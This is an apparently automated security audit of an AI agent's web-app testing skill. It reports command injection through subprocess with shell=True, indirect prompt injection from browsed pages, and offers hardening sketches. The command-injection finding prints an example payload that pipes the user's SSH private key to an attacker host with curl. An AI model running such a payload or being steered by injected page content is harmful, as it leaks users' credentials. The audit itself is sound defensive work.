webapp-testing
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, EXTERNAL_DOWNLOADS)
Full Analysis
- COMMAND_EXECUTION (HIGH): The script scripts/with_server.py uses subprocess.Popen(shell=True) to execute server start commands and subprocess.run() for test commands. These are populated directly from CLI arguments (--server, --command). An attacker could exploit this via indirect prompt injection to execute arbitrary shell commands (e.g., python scripts/with_server.py --server "npm run dev; curl http://attacker.com/$(cat ~/.ssh/id_rsa)" --port 5173 -- ls).
- INDIRECT_PROMPT_INJECTION (HIGH): The skill's primary purpose is to navigate and interact with web applications (Category 8).
- Ingestion points: The skill reads and interacts with live DOM content and console logs (examples/console_logging.py, examples/element_discovery.py).
- Boundary markers: None identified in the provided scripts; the agent is instructed to "identify selectors from rendered state" and "execute actions."
- Capability inventory: The skill has significant capabilities including file writing (/mnt/user-data/outputs/), network access (Playwright navigation), and arbitrary shell execution via with_server.py.
- Sanitization: There is no evidence of sanitization for the content retrieved from the browser before it is used to determine subsequent agent actions.
- EXTERNAL_DOWNLOADS (LOW): The skill relies on playwright, which typically downloads browser binaries (Chromium) during setup. While Playwright is a standard tool, the automated downloading of binaries is noted.
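To make the COMMAND_EXECUTION finding concrete, the following is a minimal sketch of one way a --server value could be validated and split into an argument list before it reaches subprocess, so that no shell ever interprets it. The helper name parse_server_command and the metacharacter set are assumptions for illustration; neither appears in scripts/with_server.py.

```python
import shlex

# Hypothetical helper for illustration; not part of scripts/with_server.py.
# Characters that would let a shell chain, substitute, or redirect commands.
SHELL_METACHARACTERS = set(";&|`$<>\n")


def parse_server_command(raw: str) -> list[str]:
    """Split a --server value into argv form, refusing shell metacharacters."""
    if any(ch in SHELL_METACHARACTERS for ch in raw):
        raise ValueError(f"shell metacharacter in command: {raw!r}")
    argv = shlex.split(raw)
    if not argv:
        raise ValueError("empty command")
    return argv


# The resulting list can be passed to subprocess.Popen(argv), which defaults
# to shell=False, so the arguments are never re-parsed by a shell.
```

With this check, "npm run dev" becomes ["npm", "run", "dev"], while the injected example from the finding above is rejected because it contains ";" and "$". The check is deliberately conservative: legitimate commands that rely on shell features such as "&&" would also be refused and would need a different design.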
Recommendations
- AI detected serious security threats
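As one illustration of the boundary markers the analysis found missing, the sketch below wraps browser-derived text (DOM content or console logs) in delimiters before it is handed to the agent. The function name wrap_untrusted and the marker format are assumptions, not something the skill or Playwright provides, and markers of this kind reduce the risk of indirect prompt injection without eliminating it.

```python
import secrets


def wrap_untrusted(text: str, source: str) -> str:
    """Fence browser-derived text so it is presented as data, not instructions."""
    # A random per-call token means page content cannot predict, and so
    # cannot forge, the closing marker.
    token = secrets.token_hex(8)
    return (
        f"<<UNTRUSTED {source} {token}>>\n"
        f"{text}\n"
        f"<<END UNTRUSTED {token}>>"
    )
```

A caller might pass captured console output as wrap_untrusted(log_text, "console") and instruct the agent to treat anything between the markers as untrusted data.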
Audit Metadata